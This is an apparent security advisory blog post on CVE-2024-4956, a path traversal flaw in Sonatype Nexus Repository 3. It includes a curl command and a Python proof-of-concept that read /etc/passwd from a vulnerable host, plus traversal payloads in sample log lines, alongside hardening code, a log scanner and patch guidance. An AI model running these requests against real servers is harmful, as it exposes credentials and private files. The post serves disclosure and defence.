A serious vulnerability (CVE-2024-4956) has been disclosed in Sonatype Nexus Repository 3, the artifact manager thousands of organizations use to store and serve software components. It is a path traversal bug that lets an *unauthenticated* attacker read any file on the Nexus host that the Nexus service account can read; no login, token or special privilege is required.
The fix shipped in version 3.68.1. If you are running any earlier release, assume every file readable by the Nexus process (configuration, credentials, keys) is exposed until you upgrade.
This post explains how the exploit works, demonstrates a proof-of-concept, and gives practical mitigation advice. All code examples are for educational awareness.
What is Path Traversal?
Path traversal, or directory traversal, is a common class of bug in which an application builds a filesystem path from user-supplied input without canonicalizing it and checking that the result still lies inside the intended directory. By inserting dot-dot segments (../, often URL-encoded as %2e%2e/ or ..%2f to slip past naive filters), an attacker walks out of the folder the application meant to serve and reads files anywhere the process has permission to open.
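To make the bug class concrete, here is an added example (not Nexus code, and not from the original post) of a minimal static-file handler written both ways: the naive form that a traversal exploits, and a hardened form that canonicalizes the decoded path and checks it is still under the web root before opening anything. The sandbox directory, the file names and the /static/ URL prefix are constructed for the demo.

```python
import os
import tempfile
from urllib.parse import unquote

# Constructed sandbox for the demo: a "web root" with one public file under
# static/ and a secret one level above it that must never be served.
ROOT = tempfile.mkdtemp()
STATIC = os.path.join(ROOT, "static")
os.makedirs(STATIC)
with open(os.path.join(STATIC, "app.js"), "w") as f:
    f.write("console.log('hello');")
with open(os.path.join(ROOT, "secret.txt"), "w") as f:
    f.write("db_password=hunter2")

PREFIX = "/static/"  # URL prefix mapped onto STATIC (assumed for the demo)


def serve_vulnerable(request_path: str) -> bytes:
    """Naive handler: strip the URL prefix, percent-decode, join onto STATIC.
    Nothing canonicalises the result, so '..' segments walk out of STATIC."""
    rel = unquote(request_path[len(PREFIX):])
    with open(os.path.join(STATIC, rel), "rb") as f:
        return f.read()


def serve_hardened(request_path: str) -> bytes:
    """Decode, resolve to a canonical absolute path, then refuse anything that
    does not stay inside STATIC. Checking *after* realpath() is what defeats
    '..', '%2e%2e', absolute paths and symlinks pointing outside the root."""
    rel = unquote(request_path[len(PREFIX):])
    if "\x00" in rel:
        raise PermissionError("NUL byte in path")
    base = os.path.realpath(STATIC)
    target = os.path.realpath(os.path.join(base, rel))
    if os.path.commonpath([base, target]) != base:
        raise PermissionError(f"traversal attempt: {request_path}")
    with open(target, "rb") as f:
        return f.read()


def hardened_rejects(request_path: str) -> bool:
    """True if the hardened handler refuses the request as a traversal."""
    try:
        serve_hardened(request_path)
    except PermissionError:
        return True
    return False


if __name__ == "__main__":
    print(serve_hardened("/static/app.js"))
    print(serve_vulnerable("/static/../secret.txt"))      # leaks the secret
    print(hardened_rejects("/static/%2e%2e/secret.txt"))  # True
```

The order of operations in serve_hardened is the whole point: decode first, canonicalize second, compare third. Filtering the raw string for "../" before decoding misses %2e%2e, and comparing before realpath() misses symlinks; both mistakes are the usual root cause of bugs in this class.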
In the case of Nexus Repository 3, a path traversal in a vulnerable API endpoint lets anyone fetch sensitive files, including:
- /etc/passwd (the local account list on Linux, the usual first proof that the read works), and from there any other file the Nexus service account can open, including configuration and credential files under the Nexus data directory
Technical Details
Sonatype Nexus exposes multiple HTTP endpoints that map part of the request path onto a file on disk. CVE-2024-4956 is a failure to canonicalize that request path before it is used. As a generic illustration (this is not the documented Nexus route), suppose an endpoint serves an artifact like this:
GET /repository/myrepo/assets/download/filename.zip
If the server joins the filename.zip part onto a base directory without normalizing it, an attacker can replace it with a traversal sequence and fetch an arbitrary file:
GET /repository/myrepo/assets/download/../../../etc/passwd
Each ../ walks one directory up from the base, so with enough segments the request lands at the filesystem root and the server returns a file it was never meant to serve.
For CVE-2024-4956, the endpoint reported as affected is
/static/
Other paths served by the same file-serving code may also reach the bug depending on how the instance is configured, so do not assume /static/ is the only one; verify against the vendor advisory and test your own deployment.
Proof-of-Concept Exploit
Here's a simple exploit using curl to fetch the contents of /etc/passwd from a vulnerable Nexus 3 instance. Note the --path-as-is flag: by default curl collapses ../ segments client-side before sending, so without it the request that reaches the server is just /etc/passwd and the test silently fails.
curl --path-as-is http://nexus-server:8081/static/../../../../../../../../etc/passwd
Python PoC for Windows & Linux targets
import http.client
from urllib.parse import urlparse

# Change these
NEXUS_URL = "http://target-nexus:8081"
FILE_PATH = "../../../../../../../../etc/passwd"  # Replace with target file

# requests/urllib3 (and most HTTP client libraries) normalise "../" out of the
# path before sending, which would neuter the traversal. http.client sends the
# request line verbatim, so the dot-dot segments actually reach the server.
target = urlparse(NEXUS_URL)
conn_cls = http.client.HTTPSConnection if target.scheme == "https" else http.client.HTTPConnection
conn = conn_cls(target.hostname, target.port or (443 if target.scheme == "https" else 80), timeout=10)
conn.request("GET", f"/static/{FILE_PATH}")
resp = conn.getresponse()
body = resp.read().decode(errors="replace")

if resp.status == 200:
    print(f"[+] Success! File contents:\n{body}")
else:
    print(f"[-] Failed: HTTP {resp.status}")
> NOTE: You may need to adjust the number of ../ segments so that the path reaches the filesystem root; on Linux, extra segments beyond the root are harmless, so erring on the high side is fine.
Official Sonatype Advisory:
https://support.sonatype.com/hc/en-us/articles/35574230983835
NIST NVD (CVE entry):
https://nvd.nist.gov/vuln/detail/CVE-2024-4956
GitHub Security Advisory:
https://github.com/advisories/GHSA-g9x8-m8v5-2v9x
Remediation
PATCH IMMEDIATELY.
Upgrade to Nexus Repository 3.68.1 or later. This release fixes the path traversal bug.
- Download latest: https://help.sonatype.com/repomanager3/download
- Upgrade instructions: https://help.sonatype.com/repomanager3/upgrading
- Confirm the running version before and after the upgrade (it is shown in the web UI, and a Nexus 3 instance normally reports it in the Server response header).
- Block public and untrusted access to your Nexus server at the firewall level; a repository manager rarely needs to be reachable from the Internet.
- Monitor logs for suspicious requests to /static/ and similar endpoints, including URL-encoded (%2e%2e) and double-encoded (%252e) variants of ../, and treat a 200 response on such a path as a likely successful read.
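The log-monitoring advice above is easy to get wrong if you only grep for a literal "../". As an added example (not from the original post and not a Sonatype tool), here is a small scanner that parses combined-style access-log lines, decodes the path repeatedly so encoded and double-encoded dot-dot segments surface, and flags traversal attempts against watched prefixes. The sample lines are constructed for the demo; the exact field layout of your Nexus request.log may differ, so check the regex against a real line before relying on it.

```python
import re
from urllib.parse import unquote

# Constructed sample lines in combined-log style. They are made up for this
# example; check the field order against your own Nexus request.log before
# trusting the regex on real data.
SAMPLE_LOG = """\
10.0.0.5 - - [16/May/2024:16:20:01 +0000] "GET /static/rapture/resources/favicon.ico HTTP/1.1" 200 1150 "-" "Mozilla/5.0"
203.0.113.9 - - [16/May/2024:16:21:13 +0000] "GET /static/../../../../etc/passwd HTTP/1.1" 200 1824 "-" "curl/8.4.0"
203.0.113.9 - - [16/May/2024:16:21:14 +0000] "GET /static/%2e%2e/%2e%2e/%2e%2e/etc/shadow HTTP/1.1" 403 0 "-" "python-requests/2.31"
198.51.100.7 - - [16/May/2024:16:22:40 +0000] "GET /static/..%252f..%252fWEB-INF/web.xml HTTP/1.1" 404 0 "-" "curl/8.4.0"
10.0.0.8 - - [16/May/2024:16:23:02 +0000] "GET /repository/maven-central/org/slf4j/slf4j-api/2.0.9/slf4j-api-2.0.9.pom HTTP/1.1" 200 3011 "-" "Apache-Maven/3.9.6"
"""

LINE_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<path>\S+) [^"]*" (?P<status>\d{3})'
)


def decode_fully(path: str, rounds: int = 3) -> str:
    """Percent-decode until stable so %2e%2e and double-encoded %252e%252e
    both surface as literal '..'. Bounded to avoid looping on odd input."""
    for _ in range(rounds):
        decoded = unquote(path)
        if decoded == path:
            break
        path = decoded
    return path


def has_traversal(path: str) -> bool:
    """True if any path segment, after decoding, is exactly '..'. Backslashes
    are treated as separators so Windows-style traversal is caught too."""
    decoded = decode_fully(path).replace("\\", "/")
    return any(seg == ".." for seg in decoded.split("/"))


def scan(log_text: str, prefixes=("/static/",)) -> list:
    """Return one record per request whose path starts with a watched prefix
    and contains a traversal segment. Pass prefixes=None to watch every path."""
    hits = []
    for line in log_text.splitlines():
        m = LINE_RE.match(line)
        if not m:
            continue
        path = m.group("path")
        if prefixes is not None and not path.startswith(prefixes):
            continue
        if has_traversal(path):
            hits.append({
                "ip": m.group("ip"),
                "time": m.group("ts"),
                "status": int(m.group("status")),
                "path": path,
                "decoded": decode_fully(path),
            })
    return hits


if __name__ == "__main__":
    for hit in scan(SAMPLE_LOG):
        # A 200 on a traversal path means the read most likely succeeded: escalate.
        flag = "LIKELY SUCCESS" if hit["status"] == 200 else "attempt"
        print(f'{hit["time"]} {hit["ip"]} {hit["status"]} {flag}: {hit["decoded"]}')
```

Run it with prefixes=None once you have patched, to catch probes against endpoints other than /static/; the status code is what separates a blocked scan from a confirmed read, so sort incident triage by 200s first.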
Conclusion
CVE-2024-4956 is easy to exploit and can expose sensitive files to anyone on the Internet if your Nexus server is open to the world. This is a critical issue – patch as fast as possible and check your logs for suspicious file accesses.
Timeline
Published on: 05/16/2024 16:15:10 UTC
Last modified on: 06/04/2024 17:53:05 UTC